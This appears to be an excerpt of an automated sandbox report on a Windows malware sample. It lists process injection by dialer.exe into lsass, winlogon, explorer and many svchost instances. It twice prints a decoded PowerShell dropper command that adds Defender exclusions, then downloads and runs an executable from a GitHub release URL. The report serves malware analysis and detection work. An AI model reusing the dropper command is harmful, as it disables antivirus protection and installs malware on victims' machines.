      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C0262908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C9F32908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 645B2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 7B2A2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 4F62908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2AB42908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ADB2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1992908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25DA2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F5352908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F0D62908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FFB2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C2572908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BCF2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66902908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13EF2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D572908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 69B42908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC742908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5DA72908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199D2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F3892908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B82908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E42908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6532908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 29CC2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B152908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F482908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B4B2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7D82908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E262908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D5932908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC652908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 78742908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B42908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D0A2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A642908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF32908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 49352908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60D92908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E8152908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 52342908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA92908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1A6C2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 135A2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A13B2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4D862908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E3F22908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2B8A2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 57A52908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6ED52908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7A7E2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EC7B2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E5242908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E54E2908Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeProcess created: Base64 decoded <#lif#> Add-MpPreference <#pls#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#kid#> -Force <#spr#>;(New-Object System.Net.WebClient).DownloadFile('https://github.com/tarzanre/myrepo/releases/download/a/steam.exe', <#ugl#> (Join-Path <#dqa#> -Path $env:Temp <#czq#> -ChildPath 'svc.exe'))<#vtg#>; Start-Process -FilePath <#uwf#> (Join-Path -Path $env:Temp <#lsf#> -ChildPath 'svc.exe')<#ggm#>
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeProcess created: Base64 decoded <#lif#> Add-MpPreference <#pls#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#kid#> -Force <#spr#>;(New-Object System.Net.WebClient).DownloadFile('https://github.com/tarzanre/myrepo/releases/download/a/steam.exe', <#ugl#> (Join-Path <#dqa#> -Path $env:Temp <#czq#> -ChildPath 'svc.exe'))<#vtg#>; Start-Process -FilePath <#uwf#> (Join-Path -Path $env:Temp <#lsf#> -ChildPath 'svc.exe')<#ggm#>Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeNtQuerySystemInformation: Direct from: 0x7FF6FB80ABDEJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29CC0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 7D80000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D90000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20C1A6C0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 256135A0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1AEA13B0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2144D860000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 220E3F20000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2732B8A0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27E57A50000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1A76ED50000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1457A7E0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 224EC7B0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D7E5240000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D7E54E0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: 7D80000 value: 4DJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeThread register set: target process: 7912Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeMemory written: C:\Windows\System32\dialer.exe base: A359348010Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED80000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29CC0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 7D80000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D90000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20C1A6C0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 256135A0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1AEA13B0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2144D860000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 220E3F20000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2732B8A0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27E57A50000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1A76ED50000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1457A7E0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 224EC7B0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D7E5240000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D7E54E0000Jump to behavior
